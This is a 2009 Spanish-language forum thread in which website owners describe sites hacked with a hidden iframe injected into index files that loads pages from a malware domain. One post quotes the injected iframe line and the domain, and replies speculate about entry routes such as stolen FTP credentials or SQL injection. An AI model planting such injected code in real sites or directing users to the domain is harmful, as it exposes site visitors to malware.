dudas con http://x8n.ru:8080/index.php

Iniciado por xalupeao, 1 Agosto 2009, 07:11 AM

0 Miembros y 1 Visitante están viendo este tema.

xalupeao

Bueno realmente he buscado informacion sobre esto en google

http://x8n.ru:8080/index.php

y sale simplemente que es un malware...

-------

Les cuento tengo un sitio web y google lo ha bloqueado porque me dice que es unsitio atacante, cosa que no lo es. Pero revisando mis archivos index.php y varios de mis otros index tenian dentro un <iframe src="http://x8n.ru:8080/index.php></iframe> en hidden y bueno obviamente lo borre y todo, pero mi preguntas son.

¿como llego hay?
¿porque afecta mis archivo index?
¿como puedo solucionar esto?


Gracias.
Silverhost Hosting Chile - La empresa lider de Hosting en Chile .

kamsky

malware... pues seguramente alguien haya entrado en tu server, o te lo han colado, a saber...

en esta pagina hay muchas mas como esa, pero cuidado donde clickas:

http://www.malwareurl.com/search.php?domain=&s=80.93.90.88&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

antoniojim

Nadie tiene más información sobre esto?. a mi me ha pasado igual, varias de mis webs han sido hackeadas y han puesto esta dirección cambiando todos los index, default y main.

Por favor, como han entrado???, puede ser por un agujero de seguridad de flash?

kamsky

CitarPor favor, como han entrado???, puede ser por un agujero de seguridad de flash?

jajaja, aquí hay gente muy buena, pero creo que aun no llegan a tener la habilidad de ser adivinos ni nada...como vamos a ser capaces de saber como han entrado a TU server???
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

antoniojim

Pero me refiero más bien a que procedimiento utiliza esta gente.

Estoy pensando que has sido un virus y ha cogido mi historial del filezilla. Pero no estoy seguro.

No se si está gente utiliza ese método o lo hacen por agujeros de seguridad SQL injection o XSS.

Un saludo

kamsky

pues depende de lo que tengas en tu server... pueden haber entrado por vulnerabilidades o malas configuraciones en alguno de los servicios, pueden haber entrado por el mas diseño de las aplicaciones web...
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!